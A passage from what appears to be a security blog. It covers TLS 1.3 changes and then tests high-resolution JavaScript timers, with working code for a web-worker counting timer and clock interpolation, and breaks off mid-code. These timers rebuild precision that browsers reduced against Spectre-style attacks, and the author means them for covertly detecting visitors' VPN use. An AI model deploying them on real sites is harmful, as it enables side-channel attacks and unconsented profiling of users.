<figcaption>The TLS 1.3 simplified handshake (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
<p><strong>0-RTT handshake resumption:</strong> With TLS 1.3, clients can send encrypted data in the first message. In TLS 1.2, there are two different ways to resume a connection:</p>
<ol>
<li>session ids </li>
<li>session tickets</li>
</ol>
<p>In TLS 1.3, there is a new session-resumption mode called PSK resumption, which allows for almost-instantaneous session resumption for visitors that have recently connected to your TLS server.</p>
<p>In this mode, the client and server derive a shared secret called the "resumption main secret" once a session has been established. The server either stores this secret itself or encrypts it into a session ticket, which is sent to the client and redeemed when the session is resumed.</p>
<p>The next time the client connects to the server, it can take the secret from the previous session and use it to encrypt application data that is sent to the server (alongside sending the session ticket). The server validates the session ticket and the session resumes.</p>
<p><strong>TLS 1.3 reduces choice in cryptographic schemes:</strong> TLS 1.3 reduces Diffie-Hellman parameters to ones that are known to be secure. Furthermore, TLS 1.3 also heavily reduces the choice of symmetric ciphers used for encryption and their modes of operation. In fact, TLS 1.3 removed all CBC-mode ciphers and insecure stream ciphers such as RC4. The only symmetric crypto that is still allowed in TLS 1.3 are AEAD (authenticated encryption with associated data) ciphers, which means that encryption and integrity protection occur in one and the same operation.</p>
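<p>What "encryption and integrity in one operation" means in practice can be shown with AES-128-GCM from Node.js' <code>crypto</code> module. This is a minimal sketch, not how a TLS stack builds its records: <code>seal</code> and <code>open</code> are hypothetical helper names, and key and nonce handling is reduced to the bare minimum (a 16-byte key and a 12-byte nonce that must never be reused with the same key).</p>

```javascript
const crypto = require('node:crypto');

// Encrypts `plaintext` and authenticates it together with `aad`
// (additional data that is integrity-protected but not encrypted).
function seal(key, nonce, plaintext, aad) {
  const cipher = crypto.createCipheriv('aes-128-gcm', key, nonce);
  cipher.setAAD(aad);
  const ciphertext = Buffer.concat([cipher.update(plaintext), cipher.final()]);
  return { ciphertext: ciphertext, tag: cipher.getAuthTag() };
}

// Decrypts and verifies in one go. final() throws if the ciphertext,
// the tag or the additional data were modified.
function open(key, nonce, sealed, aad) {
  const decipher = crypto.createDecipheriv('aes-128-gcm', key, nonce);
  decipher.setAAD(aad);
  decipher.setAuthTag(sealed.tag);
  return Buffer.concat([decipher.update(sealed.ciphertext), decipher.final()]);
}
```

<p>There is no separate MAC step that an implementation could forget or perform in the wrong order, which is exactly the class of mistakes that hurt the CBC-mode ciphers.</p>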
<p>Among others, TLS 1.3 mandated the removal of the following TLS 1.2 algorithms and features:</p>
<ul>
<li>RC4 Stream Cipher</li>
<li>RSA Key Exchange</li>
<li>SHA-1 Hash Function</li>
<li>CBC (Block) Mode Ciphers</li>
<li>MD5 Algorithm</li>
<li>Various non-ephemeral Diffie-Hellman groups</li>
<li>EXPORT-strength ciphers</li>
<li>DES</li>
<li>3DES</li>
</ul>
<p><strong>Removing PKCS#1 v1.5 padding:</strong> As discussed above, <a href="https://en.wikipedia.org/wiki/Daniel_Bleichenbacher">Bleichenbacher attacks</a> were possible against RSA with PKCS#1 v1.5 padding as used in TLS 1.2; the underlying problem is the difficulty of implementing RSA padding correctly. In TLS 1.3, the newer RSA-PSS design replaces PKCS#1 v1.5 padding for handshake signatures.</p>
<p><strong>Signing the whole handshake:</strong> The TLS server uses a digital signature to prove that the key exchange was not tampered with. In TLS 1.2, the server signature only covers part of the handshake; in particular, it does not cover the part where the symmetric cipher is negotiated. This led to a number of vulnerabilities such as FREAK and LogJam, where a man-in-the-middle attacker can downgrade the negotiation to intentionally weak ciphers (export ciphers). In TLS 1.3, the server signs the entire handshake transcript.</p>
<figure>
<img src="https://incolumitas.com/images/FREAK.png" alt="TLS 1.2 vs FREAK" />
<figcaption>The TLS FREAK downgrade attack (<a href="https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/">Image taken from the Cloudflare blog</a>)</figcaption>
</figure>
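<p>Why signing the whole transcript stops such downgrades can be illustrated with a few lines of Node.js. This is a strongly simplified sketch: the messages are plain strings, Ed25519 is used as the signature scheme for brevity, and <code>transcriptHash</code>, <code>signTranscript</code> and <code>verifyTranscript</code> are hypothetical names. Real TLS 1.3 signs a context string together with the transcript hash and uses length-prefixed binary messages.</p>

```javascript
const crypto = require('node:crypto');

// Stand-in for the key pair that belongs to the server certificate.
const serverKeys = crypto.generateKeyPairSync('ed25519');

// Hash over all handshake messages seen so far, in order.
function transcriptHash(messages) {
  const hash = crypto.createHash('sha256');
  for (const message of messages) {
    hash.update(message);
  }
  return hash.digest();
}

// Server side: sign the transcript as the server has seen it.
function signTranscript(messages) {
  return crypto.sign(null, transcriptHash(messages), serverKeys.privateKey);
}

// Client side: verify the signature against the client's own view.
function verifyTranscript(messages, signature) {
  return crypto.verify(null, transcriptHash(messages), serverKeys.publicKey, signature);
}
```

<p>If a man-in-the-middle strips the strong ciphers from the ClientHello, the server signs a transcript that differs from what the client actually sent, so <code>verifyTranscript()</code> returns <code>false</code> on the client and the handshake is aborted.</p>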
<p><strong>General protocol simplification:</strong> In previous TLS protocols, the entire ciphersuite was negotiated including many crypto attributes:</p>
<ul>
<li>certificate types that are supported</li>
<li>hash function used (SHA1, SHA256, ...)</li>
<li>MAC function (HMAC with SHA1, SHA256, ...)</li>
<li>key exchange algorithm (RSA, ECDHE, ...)</li>
<li>cipher (e.g., AES, RC4, ...) and cipher mode, if applicable (e.g., CBC)</li>
</ul>
<p>This led to a combinatorial explosion of cipher suite code points that had to be maintained by the Internet Assigned Numbers Authority (IANA). There is the <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4">IANA page</a> that hosts a <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv">CSV file</a> that includes all the cipher suites currently used in TLS 1.2. It's a huge file!</p>
<p>TLS 1.3 on the other hand only allows peers to negotiate:</p>
<ul>
<li>Cipher + HKDF Hash</li>
<li>Key Exchange</li>
<li>Signature Algorithm</li>
</ul>
<p>As discussed above, this has the side effect that the handshake only needs one RTT instead of two RTTs.</p>
<p><strong>Simplified Cipher Suites:</strong> </p>
<p>Due to this massive elimination of cipher suites in TLS 1.3, the number of possible cipher suites went down.</p>
<p>A TLS 1.2 cipher suite had the following format:</p>
<figure>
<img src="https://incolumitas.com/images/TLS-1.2-Cipher-Suite.png" alt="TLS 1.2 ciphersuite" />
<figcaption>TLS 1.2 ciphersuite (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
<p>And this is how a TLS 1.3 ciphersuite looks. Much easier, right?!</p>
<figure>
<img src="https://incolumitas.com/images/TLS-1.3-cipher-suite.png" alt="TLS 1.3 ciphersuite" />
<figcaption>Much simpler TLS 1.3 ciphersuite (<a href="https://www.thesslstore.com/blog/tls-1-3-everything-possibly-needed-know/">Image taken from the www.thesslstore.com blog</a>)</figcaption>
</figure>
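<p>The difference between the two naming schemes is easy to see when the names are split into their components. The following parser is only a sketch based on the naming convention shown in the two figures; <code>parseCipherSuite</code> is a made-up helper and it does not cover every exotic entry of the IANA registry.</p>

```javascript
// Splits a cipher suite name into its building blocks.
function parseCipherSuite(name) {
  const halves = name.split('_WITH_');
  if (halves.length === 2) {
    // Old style: TLS_[key exchange]_[authentication]_WITH_[cipher]_[hash]
    const head = halves[0].replace(/^TLS_/, '').split('_');
    const tail = halves[1].split('_');
    return {
      style: 'TLS 1.2',
      keyExchange: head[0],
      // Suites such as TLS_RSA_WITH_... use RSA for both roles.
      authentication: head[1] || head[0],
      cipher: tail.slice(0, -1).join('_'),
      hash: tail[tail.length - 1],
    };
  }
  // TLS 1.3 style: TLS_[AEAD cipher]_[HKDF hash]
  const parts = name.replace(/^TLS_/, '').split('_');
  return {
    style: 'TLS 1.3',
    cipher: parts.slice(0, -1).join('_'),
    hash: parts[parts.length - 1],
  };
}
```

<p>For a TLS 1.3 name, only the AEAD cipher and the hash remain. Key exchange and signature algorithm are negotiated separately and are no longer part of the cipher suite.</p>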
<p>There were an awful lot of <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv">TLS 1.2 ciphersuite choices</a>. </p>
<p>With TLS 1.3, we have only the following recommended secure choices:</p>
<ul>
<li>TLS_AES_256_GCM_SHA384</li>
<li>TLS_CHACHA20_POLY1305_SHA256</li>
<li>TLS_AES_128_GCM_SHA256</li>
<li>TLS_AES_128_CCM_8_SHA256</li>
<li>TLS_AES_128_CCM_SHA256</li>
</ul>On High-Precision JavaScript Timers2021-12-18T20:40:00+01:002021-12-18T20:40:00+01:00Nikolai Tschachertag:incolumitas.com,2021-12-18:/2021/12/18/on-high-precision-javascript-timers/<p>In this blog post, I am investigating the current state of high precision JavaScript timers. High precision timing techniques were mostly used to launch CPU-level cache attacks such as Spectre and Meltdown from the browser. I am interested in other use cases though...</p><h2>Introduction</h2>
<p>In this blog post, I am investigating the current state of high precision JavaScript timers. High precision timing techniques were mostly required to launch CPU-level cache attacks such as <a href="https://spectreattack.com/spectre.pdf">Spectre</a> and <a href="https://meltdownattack.com/meltdown.pdf">Meltdown</a> from within the browser with JavaScript. However, I am not interested in cache attacks; I need high precision JavaScript timing techniques mostly to detect proxies and VPN usage via side channel analysis.</p>
<p>That said, the papers mentioned above are deeply amazing. I do not think that it gets much better in the field of IT security. The sheer human creativity demonstrated by finding those cache and CPU-level attack vectors is simply outstanding. I highly recommend reading those papers (and also the <a href="https://platypusattack.com/platypus.pdf">Platypus paper</a> on power side-channel attacks).</p>
<p>Firefox and Google Chrome <strong>reduced the precision of <code>performance.now()</code> significantly</strong>:</p>
<ol>
<li><a href="https://developer.chrome.com/blog/cross-origin-isolated-hr-timers/">Google Chrome reduced</a> the <code>performance.now()</code> precision to 100 microseconds (<code>100µs</code> or <code>0.1ms</code>)</li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/now#reduced_time_precision">Firefox reduced</a> the <code>performance.now()</code> precision even more to 1000 microseconds (<code>1000µs</code> or <code>1ms</code>)</li>
</ol>
<p><em>Those bastards!</em></p>
<p>As mentioned, high precision timers are used to launch side-channel and timing attacks. In recent years, low level vulnerabilities such as Spectre, Meltdown and Rowhammer emerged. They all have in common that the attacker needs the ability to take high resolution time measurements.</p>
<p>The awesome <a href="https://security.googleblog.com/2021/03/a-spectre-proof-of-concept-for-spectre.html">Google Security Blog</a> explains on the <a href="https://leaky.page/timer.html">Spectre Proof-Of-Concept website</a> why:</p>
<blockquote>
<p>Before we run the Spectre proof of concept, we need a way to observe the side-effects of the transient execution. The most popular one is a cache side channel. By timing a memory access, we can infer if a chosen address is in the cache (if the access is fast) or needs to be loaded from memory (if the access is slow). Later, we will use a Spectre gadget to access a JavaScript array using a secret value as the index. Testing which array index got cached will allow us to recover that secret value.</p>
</blockquote>
<p>So I learned that:</p>
<ul>
<li>Timing memory accesses reveals if a chosen address is in the cache or not</li>
<li>A fast memory access means that the accessed address is cached</li>
<li>A slow memory access means that the accessed address needs to be loaded from the memory</li>
<li>In order to measure the tiny difference in access times, <strong>we need high-precision JavaScript timers</strong></li>
</ul>
<p>And then they go on...</p>
<blockquote>
<p>To be able to measure these small timing differences we need a high-precision timer. There is a great paper on this topic by Michael Schwarz, Clémentine Maurice, Daniel Gruss, and Stefan Mangard: <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">"Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript"</a>. One example they show is the use of a SharedArrayBuffer as a monotonic clock: increment a counter in a worker thread and read it from a second thread as a high precision timestamp. SharedArrayBuffers in particular are nowadays only available if the site is cross-origin isolated but there are many more timers described in that paper.</p>
</blockquote>
<p>Unfortunately, the <code>SharedArrayBuffer</code> is no longer allowed by default. MDN says about <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/SharedArrayBuffer#security_requirements">SharedArrayBuffer</a>:</p>
<blockquote>
<p>Shared memory and high-resolution timers were effectively disabled at the start of 2018 in light of Spectre. </p>
</blockquote>
<p>and if you still want to use <code>SharedArrayBuffer</code>, you will need to do the following:</p>
<blockquote>
<p>As a baseline requirement, your document needs to be in a secure context. For top-level documents, two headers will need to be set to cross-origin isolate your site: <code>Cross-Origin-Opener-Policy</code> with <code>same-origin</code> as value (protects your origin from attackers) and <code>Cross-Origin-Embedder-Policy</code> with <code>require-corp</code> as value (protects victims from your origin)</p>
</blockquote>
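<p>On the server side, this comes down to two response headers. Below is a minimal sketch using Node.js' built-in <code>http</code> module; <code>ISOLATION_HEADERS</code> and <code>createIsolatedServer</code> are hypothetical names, and I am assuming the page is served from <code>localhost</code> or over HTTPS so that the secure context requirement is met.</p>

```javascript
const http = require('node:http');

// The two headers from the MDN quote above.
const ISOLATION_HEADERS = {
  'Cross-Origin-Opener-Policy': 'same-origin',
  'Cross-Origin-Embedder-Policy': 'require-corp',
};

// Returns an HTTP server that delivers `body` as a cross-origin isolated
// top-level document. The caller decides when and where to listen().
function createIsolatedServer(body) {
  return http.createServer(function (req, res) {
    res.writeHead(200, { 'Content-Type': 'text/html', ...ISOLATION_HEADERS });
    res.end(body);
  });
}
```

<p>After starting it with something like <code>createIsolatedServer(html).listen(8080)</code>, the page can check the global <code>crossOriginIsolated</code> property in the browser to see whether the isolation took effect.</p>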
<p>So my next idea is to try to make use of the other high precision timers presented in the paper cited above: <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript</a>.</p>
<p>Do the proposed techniques from early 2017 still work? In the next sections, I am going to test some of the techniques presented by the authors.</p>
<p>All tests were conducted on Ubuntu 18.04 with the <code>Chromium 95.0.4638.69</code> browser.</p>
<h2>Base precision of <code>performance.now()</code></h2>
<p>My setup:</p>
<div class="highlight"><pre><span></span><code>$ chromium-browser --version
Chromium <span class="m">95</span>.0.4638.69 Built on Ubuntu , running on Ubuntu <span class="m">18</span>.04
</code></pre></div>
<p>First of all, I want to confirm that the precision/resolution of <code>performance.now()</code> is really <code>100µs</code> or <code>0.1ms</code> on <code>Chromium 95.0.4638.69</code>.</p>
<p>This is accomplished by the JavaScript snippet below. I collect 10,000 <code>performance.now()</code> samples in a for-loop and check how many unique values are among them. Dividing the elapsed time by the number of unique values gives me the precision.</p>
<div class="highlight"><pre><span></span><code><span class="s1">'use strict'</span><span class="p">;</span>
<span class="c1">// The performance.now() method returns a DOMHighResTimeStamp, measured in milliseconds.</span>
<span class="kd">var</span> <span class="nx">samples</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">10000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">samples</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">());</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">diff1</span> <span class="o">=</span> <span class="nx">t1</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">diff2</span> <span class="o">=</span> <span class="nx">samples</span><span class="p">[</span><span class="nx">samples</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">-</span> <span class="nx">samples</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'#1 Elapsed measured by performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'#2 Elapsed measured by collected samples: '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Number of samples: '</span> <span class="o">+</span> <span class="nx">samples</span><span class="p">.</span><span class="nx">length</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">s</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Set</span><span class="p">(</span><span class="nx">samples</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Number of unique samples / measuring steps: '</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Granularity/Precision #1 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff1</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Granularity/Precision #2 of performance.now(): '</span> <span class="o">+</span> <span class="nx">diff2</span> <span class="o">/</span> <span class="nx">s</span><span class="p">.</span><span class="nx">size</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
</code></pre></div>
<p>As expected, the precision is almost exactly <code>100µs</code> or <code>0.1ms</code>.</p>
<div class="highlight"><pre><span></span><code>#1 Elapsed measured by performance.now(): 15.20000000006985ms
#2 Elapsed measured by collected samples: 15.20000000006985ms
Number of samples: 10000
Number of unique samples / measuring steps: 146
Granularity/Precision #1 of performance.now(): 0.10410958904157432ms
Granularity/Precision #2 of performance.now(): 0.10410958904157432ms
</code></pre></div>
<p>If you invoke <code>performance.now()</code> repeatedly in a while loop until it returns a new timer value, and you increment a counter on every iteration, then the final value of the counter is considered the edge size of the timer resolution.</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">edgeSize</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">while</span><span class="p">((</span><span class="nx">next</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">())</span> <span class="o">==</span> <span class="nx">last</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">counter</span><span class="p">);</span>
<span class="p">})()</span>
</code></pre></div>
<p>Put differently, the granularity of the <code>performance.now()</code> resolution can be measured in terms of increments of the <code>counter</code> variable. The counter is reset as soon as a new <code>performance.now()</code> value is observed.</p>
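<p>One weakness of the snippet above is that counting starts somewhere in the middle of a clock tick, so the counter only covers the remainder of that tick. A possible refinement, sketched here under my own assumptions, is to first busy-wait for the next clock edge and only then start counting. The helper <code>measureEdge</code> is a hypothetical name, and the clock is passed in as a function so that the logic can also be exercised with a fake clock.</p>

```javascript
// Counts busy-loop iterations between two consecutive clock edges.
// `now` is any clock function, e.g. function () { return performance.now(); }
function measureEdge(now) {
  // Step 1: spin until the clock value changes, so that counting
  // starts right at the beginning of a tick.
  const start = now();
  let edge = now();
  while (edge === start) {
    edge = now();
  }
  // Step 2: count the iterations until the following edge.
  let counter = 0;
  while (now() === edge) {
    counter++;
  }
  return counter;
}
```

<p>In the browser, <code>measureEdge(function () { return performance.now(); })</code> returns the number of loop iterations that fit into one full tick of the timer. The absolute number depends on the machine and the JavaScript engine, so it is only meaningful relative to other measurements taken in the same environment.</p>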
<h2>Building a Timer by (ab)using Web Workers</h2>
<p>JavaScript's concurrency model is based on a single-threaded event loop. Multithreading was introduced into JavaScript with <em>web workers</em>, which run in parallel and have their own event loop.</p>
<p>Here, I am creating an <strong>implicit timer</strong> by attempting to abuse web workers to derive highly accurate timestamps. Put differently, we throw <code>performance.now()</code> into the trash and create our own timer!</p>
<p>Or more nuanced: We create a web worker thread and let it monotonically increase a counter and consider it an approximation of a real timer.</p>
<p>But the <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> lists some caveats:</p>
<blockquote>
<p>Web workers cannot post messages to other web workers (including themselves). They can only post messages to the main thread and web workers they spawn, so called sub workers.
Posting messages to the main thread again blocks the main thread’s event loop,
leaving sub web workers as the only viable option.</p>
</blockquote>
<p><a
class="btn"
style="margin-top: 3px; margin-bottom: 3px"
href="https://bot.incolumitas.com/timers/web_worker_timer.html">
Live Example of High-Precision Web Worker Timer
</a></p>
<p>And this is how our implicit timer works:</p>
<ol>
<li>
<p>If the worker receives a message from the main thread, it sends back its current counter value. </p>
</li>
<li>
<p>Otherwise, the worker continuously <em>requests</em> the current counter value from the sub worker.</p>
</li>
<li>
<p>The sub worker increments the counter on each request and sends the current
value back to the worker.</p>
</li>
</ol>
<p>And in code:</p>
<p><code>web_worker_timer.html</code>:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ts</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Worker</span><span class="p">(</span><span class="s1">'subworker.js'</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">counter</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">count</span> <span class="o">></span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Counter: '</span> <span class="o">+</span> <span class="nx">count</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">precision</span> <span class="o">=</span> <span class="nx">elapsed</span> <span class="o">/</span> <span class="nx">count</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Precision: '</span> <span class="o">+</span> <span class="nx">precision</span> <span class="o">+</span> <span class="s1">' ms<br>'</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'message'</span><span class="p">,</span> <span class="nx">counter</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="c1">// setTimeout() acts as a method that</span>
<span class="c1">// we want to time</span>
<span class="nx">setTimeout</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">'Elapsed Time: '</span> <span class="o">+</span> <span class="nx">elapsed</span> <span class="o">+</span> <span class="s1">'<br>'</span><span class="p">);</span>
<span class="p">},</span> <span class="mf">1000</span><span class="p">)</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p><code>subworker.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">sub</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Worker</span><span class="p">(</span><span class="s1">'subworker2.js'</span><span class="p">);</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span>
<span class="nx">onmessage</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">msg</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">data</span> <span class="o">!=</span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span> <span class="o">=</span> <span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
<span class="nx">sub</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="mf">0</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">self</span><span class="p">.</span><span class="nx">postMessage</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p><code>subworker2.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">count</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">count</span><span class="o">++</span><span class="p">;</span>
<span class="nx">postMessage</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>But what is the precision I am able to obtain with the above method?</p>
<div class="highlight"><pre><span></span><code>Elapsed Time: 1000.2000000001863
Counter: 10844
Precision: 0.09223533751384971 ms
</code></pre></div>
<p>So this is bad news. I only manage to obtain roughly the same precision that <code>performance.now()</code> already gives us. Fail!</p>
<p>The authors of the <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> claim that the achieved resolution is up to <code>15 μs</code>. I only manage to get around <code>90µs</code> to <code>100µs</code> with my somewhat old laptop from 2014.</p>
<p>However, on <a href="https://browserstack.com/">browserstack.com</a>, when using a real device, I manage to get results around <code>40µs</code> to <code>50µs</code>, thus beating <code>performance.now()</code>:</p>
<div class="highlight"><pre><span></span><code>Elapsed Time: 1041.89999
Counter: 19083
Precision: 0.0545 ms
</code></pre></div>
<p>Therefore, with fast devices, the claimed <code>15 μs</code> is probably realistic!</p>
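<p>The precision figures in both runs are simply the elapsed time divided by the counter value. A minimal sketch of that arithmetic, using the numbers printed above (the helper name <code>resolutionMicros</code> is my own and not part of the original demo):</p>

```javascript
// Convert a counter reading into a timer resolution.
// elapsedMs: wall-clock time as measured with performance.now()
// count:     number of increments the counting worker reported in that time
function resolutionMicros(elapsedMs, count) {
  return (elapsedMs / count) * 1000;
}

// Values copied from the two runs shown above.
const laptop = resolutionMicros(1000.2000000001863, 10844);
const browserstack = resolutionMicros(1041.89999, 19083);

console.log(laptop.toFixed(1) + ' µs per increment (2014 laptop)');
console.log(browserstack.toFixed(1) + ' µs per increment (browserstack device)');
```

<p>The more increments the worker manages per second, the smaller the time slice each increment stands for, which is why a faster device directly translates into a finer timer.</p>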
<h2>Recovering the high resolution of <code>performance.now()</code> with clock interpolation</h2>
<p><a
class="btn"
href="https://bot.incolumitas.com/timers/calibrate.html">
Live Example of Clock Interpolation
</a></p>
<p>The <a href="https://pure.tugraz.at/ws/portalfiles/portal/17611474/fantastictimers.pdf">Fantastic Timers Paper</a> claims in section [3.1 Recovering a high resolution]:</p>
<blockquote>
<p>As the underlying clock source has a high resolution, the
difference between two clock edges varies only as much as the underlying clock.
This property gives us a very accurate time base to build upon. As the time
between two edges is always constant, we interpolate the time between them.</p>
</blockquote>
<p>The idea is as follows:</p>
<p>When repeatedly invoking <code>performance.now()</code> in a while loop, we get the same results from the <code>performance.now()</code> invocation for a certain amount of time. As long as <code>performance.now()</code> yields the same number, we increment a counter. When we get a new value from <code>performance.now()</code>, we reset the counter.</p>
<p>The code below takes <code>n=20</code> samples:</p>
<div class="highlight"><pre><span></span><code><span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">20</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">counter</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">next</span><span class="p">,</span> <span class="nx">last</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
